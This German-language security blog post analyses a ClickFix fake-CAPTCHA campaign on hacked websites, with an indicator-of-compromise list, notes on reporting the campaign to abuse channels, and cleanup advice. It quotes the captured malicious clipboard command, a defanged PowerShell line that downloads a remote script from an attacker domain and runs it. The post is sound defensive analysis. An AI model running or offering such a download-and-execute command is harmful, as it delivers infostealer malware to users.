Bask TechEN

Gefälschte „Human Verification“-Seiten verbreiten Schadsoftware

Bask Tech7 Min. Lesezeit

Was du da eigentlich vor dir hast

Du bist auf einer ganz normalen Website – einem Shop, einem Blog, einem lokalen Unternehmen – und plötzlich erscheint ein bildschirmfüllendes Overlay, das exakt wie Cloudflares vertraute „bestätige, dass du ein Mensch bist“-Prüfung aussieht. Es ist nicht echt. Die Website wurde gehackt, und ein Angreifer hat dieses Overlay eingeschleust. Der Betreiber der Seite ist meist selbst ein Opfer und weiß oft nichts davon. Die Seite führt dich dann durch ein paar „Verifizierungs-Schritte“: drücke Win + R, füge ein und drücke Enter.

Eine gefälschte Cloudflare-Seite „bestätige, dass du ein Mensch bist“ auf einer kompromittierten Website, die den Besucher auffordert, Win+R zu drücken, einzufügen und Enter zu drücken
Das gefälschte „Human Verification“-Overlay und seine Tastatur-Schritte. Wir haben den Namen der Seite unkenntlich gemacht – es handelt sich um ein seriöses Unternehmen, das kompromittiert wurde, nicht um den Angreifer.

Wie der Trick funktioniert

Der Angriff ist eine Kette aus fünf kurzen Schritten:

  1. Kompromittierung. Angreifer dringen in eine seriöse Website ein – meist über ein veraltetes CMS oder Plugin – und schleusen ein kleines Stück JavaScript ein.
  2. Der Köder. Dieses Skript zeigt dir das gefälschte „bestätige, dass du ein Mensch bist“-Overlay.
  3. Zwischenablage-Hijack. Sobald du damit interagierst, kopiert die Seite still einen Befehl in deine Zwischenablage. Du kopierst nie bewusst etwas.
  4. Die Anweisung. Die Schritte auf dem Bildschirm (Win + R → einfügen → Enter) bringen dich dazu, diesen Befehl selbst auszuführen.
  5. Ausführung. Der Befehl lädt die Schadsoftware der Angreifer herunter, führt sie aus und schließt dann das Fenster, damit du nichts merkst.

Hier ist der tatsächliche Befehl, den die Seite in deine Zwischenablage legt – entschärft, damit er gefahrlos zu lesen ist:

<#Verification ID: 7b8f53452fdafe1a#>
powershell -c "iex(irm 'hxxps://claudverification-id[.]beer/7b8f53452fdafe1a' -UseBasicParsing)"; exit

Vereinfacht gesagt bedeutet iex(irm '…') „lade ein Skript vom Server der Angreifer herunter und führe es sofort im Arbeitsspeicher aus“. Das Ergebnis passt zu einem Infostealer – Schadsoftware, die gespeicherte Passwörter, Browser-Cookies und Krypto-Wallet-Daten abgreift. Wir haben die Schadsoftware bewusst nicht heruntergeladen oder ausgeführt und daher die genaue Malware-Familie nicht bestimmt; der sichere Nachweis des Angriffs hatte Vorrang.

Ein Detail stach heraus: Die Domains der Angreifer sind so benannt, dass sie sowohl Cloudflare als auch Anthropics Claude imitieren – Namen wie claudverification-id, verification-claude-cdn und claudesave. Selbst ein vorsichtiger Nutzer, der seinen Netzwerkverkehr prüft, sieht beruhigend „offiziell“ wirkende Namen. Vertrauen, als Waffe.

Was wir herausgefunden haben

Wir sind von einer einzigen kompromittierten Winzer-Website ausgegangen und haben den Faden weiterverfolgt. Mit öffentlichen Werkzeugen – urlscan.io und Certificate-Transparency-Logs – haben wir die Infrastruktur der Kampagne kartiert: 18 Domains, seit März 2026 in stetigem Strom registriert, über die Top-Level-Domains .beer, .sbs und .shop. Alles liegt hinter einem einzigen Registrar und einem einzigen Server auf den Seychellen, und die Infrastruktur wechselt etwa täglich. Für eine derart verbreitete Kampagne ist das ein ungewöhnlich konzentrierter Aufbau – ein Registrar, eine IP – was sie zugleich zu einem klaren Ziel für eine Abschaltung macht.

Dann haben wir einen kleinen Crawler gebaut, um die Opfer zu finden. Er arbeitet nach dem Prinzip „erkennen, nicht zünden“: Er öffnet jede verdächtige Seite in einem isolierten Wegwerf-Browser, beobachtet, was die Seite in die Zwischenablage zu kopieren versucht, und blockiert jeden Versuch, die Schadsoftware tatsächlich herunterzuladen. Eine Seite wird nur bei eindeutigen Belegen als „bestätigt“ markiert – nie auf Verdacht.

In einem einzigen, unvollständigen Lauf hat er 28 aktiv infizierte Websites in 12 Ländern bestätigt: Australien, Großbritannien, die VAE, Brasilien, Argentinien, die Türkei, Vietnam, Bulgarien, Indien, die USA, Kanada und Syrien. Die meisten waren kleine Unternehmen und Online-Shops, aber darunter waren auch eine NGO, eine gemeinnützige Organisation und ein nationaler Branchenverband. Das ist opportunistische Massenkompromittierung, kein gezielter Angriff – und 28 ist eine Untergrenze, keine Obergrenze: Der Lauf wurde abgebrochen und die Infrastruktur wechselt täglich, die echte Zahl liegt also mit Sicherheit höher.

Indicators of Compromise der ClickFix-/Fake-CAPTCHA-Kampagne (entschärft)
IndicatorTypeNote
178.16.52[.]101UrsprungsserverAlle Domains zeigen hierher, ohne Proxy
AS202412 — Omegatech LTD, SeychellesHosting / ASN
claudverification-id[.]beerKöder-DomainGefälschte Seite für Besucher
verification-code-js[.]beerKöder-DomainGefälschte Seite für Besucher
idverification-code[.]beerKöder-DomainGefälschte Seite für Besucher
codecerification[.]beerKöder-DomainGefälschte Seite für Besucher
claudesave[.]beerKöder-DomainGefälschte Seite für Besucher
ethercdnns[.]beerKöder-DomainGefälschte Seite für Besucher
cdn-2faclov[.]sbsKöder-DomainGefälschte Seite für Besucher
verification-claude-cdn[.]beerKöder-DomainGefälschte Seite für Besucher
framesavecloudjs[.]beer (suspended)Köder-DomainGefälschte Seite für Besucher
Zwischenablage gesetzt auf: powershell -c "iex(irm '...')"; exitVerhaltenEindeutiges ClickFix-Signal

Neun weitere Helfer-/Staging-Domains liegen auf demselben Server:

cgfuryclaud[.]shop
winecdn[.]sbs
ghdnsserverns[.]beer
npanssltejs[.]beer
sssndns[.]beer
workcdnmass[.]beer
biyaconserver[.]beer
sdnssmdf-js[.]beer
bbdsnssserver[.]beer

Klassifizierung: ClickFix · FakeCaptcha · ClearFake.

Was wir dagegen getan haben

Wir haben die Kampagne über sechs Kanäle gemeldet, damit sie überall zugleich abgeschaltet und blockiert wird:

  • Google Safe Browsing – die für Besucher sichtbaren Köder-Domains, damit Browser automatisch warnen.
  • URLhaus und ThreatFox (abuse.ch) – die schädlichen URLs und Domain-Indikatoren, die weltweit in Sicherheitsprodukte einfließen.
  • Hosting-Anbieter und Domain-Registrar – gebündelte Missbrauchsmeldungen für die gesamte Kampagne.
  • Anthropic – die Imitation der Marke Claude.

Als wir nachgesehen haben, war eine der Köder-Domains bereits vom Registrar gesperrt worden – ein Zeichen, dass das Meldewesen greift. Wir haben außerdem die Betreiber jeder von uns identifizierten betroffenen Seite kontaktiert, damit sie aufräumen können.

Falls du das hier liest, weil wir dich kontaktiert haben – danke, dass du es ernst nimmst. Der folgende Abschnitt zeigt dir genau, was du prüfen und wie du bereinigen solltest.

Wenn du eine Website betreibst: prüfen und bereinigen

  1. Öffne deine Seite in einem privaten / Inkognito-Fenster. Wenn du einen „bestätige, dass du ein Mensch bist“-Schritt siehst, der vorher nie da war, behandle das als Kompromittierung.
  2. Lass deinen Web-Admin oder Hoster nach kürzlich geänderten Dateien und eingeschleusten <script>-Tags suchen, die auf unbekannte externe Domains verweisen, und entferne sie.
  3. Aktualisiere dein CMS sowie jedes Plugin und Theme auf die neueste Version.
  4. Wechsle alle Zugangsdaten: CMS-Logins, FTP/SFTP, Hosting-Control-Panel und Datenbank-Passwörter.
  5. Spiele ein nachweislich sauberes Backup ein, falls vorhanden, und scanne anschließend erneut, um sicherzugehen, dass die Einschleusung weg ist.

Wenn du nur surfst: so bleibst du sicher

  • Die eine Regel: Kein echtes CAPTCHA und kein Verifizierungsschritt fordert dich jemals auf, „Ausführen“, PowerShell oder ein Terminal zu öffnen oder einen Befehl einzufügen. Diese Aufforderung ist der Angriff.
  • Das konkrete Warnsignal ist jede Seite, die dich auffordert, Win + R zu drücken und etwas einzufügen.
  • Falls du es schon ausgeführt hast, folge den Schritten im roten Kasten oben auf dieser Seite – behandle das Gerät als kompromittiert und ändere deine Passwörter von einem sauberen Gerät aus.

Quellen & weiterführende Links

Wir entwickeln und sichern Technologie für wirkungsorientierte Organisationen. Wenn du vermutest, dass deine Seite betroffen sein könnte, und nicht weißt, wo du anfangen sollst, melde dich – wir helfen gern.

Häufige Fragen

Ich habe einen Befehl aus einer „Cloudflare-Verifizierung" eingefügt — was jetzt?+

Geh davon aus, dass dein Gerät kompromittiert sein könnte. Trenne die Internetverbindung, gib keine Passwörter ein, führe einen vollständigen Virenscan durch und ändere wichtige Passwörter von einem anderen, vertrauenswürdigen Gerät. Bei einem Arbeitsrechner informiere deine IT.

Fragt ein echtes Cloudflare- oder Google-CAPTCHA jemals nach Tastenkürzeln oder Einfügen?+

Nein. Ein echtes CAPTCHA bleibt im Browser — du setzt ein Häkchen oder klickst Bilder an. Es verlangt nie, Win+R zu drücken, ein Terminal zu öffnen oder einen Befehl einzufügen.

Ist die Website, auf der ich das gesehen habe, der Angreifer?+

Meistens nicht. Diese Seiten erscheinen auf eigentlich seriösen, aber gehackten Websites. Der Betreiber ist ebenfalls Opfer und weiß es in der Regel nicht.

Was ist ClickFix?+

ClickFix ist eine Social-Engineering-Masche: Eine gefälschte Fehler- oder Verifizierungsseite bringt dich dazu, einen Befehl in die Zwischenablage zu kopieren und selbst auszuführen — das installiert Schadsoftware, oft einen Infostealer.

Was macht der Befehl genau?+

Er startet PowerShell, lädt ein Skript von einer Angreifer-Domain und führt es im Speicher aus. Diese zweite Stufe stiehlt typischerweise gespeicherte Passwörter, Browserdaten und Krypto-Wallet-Informationen.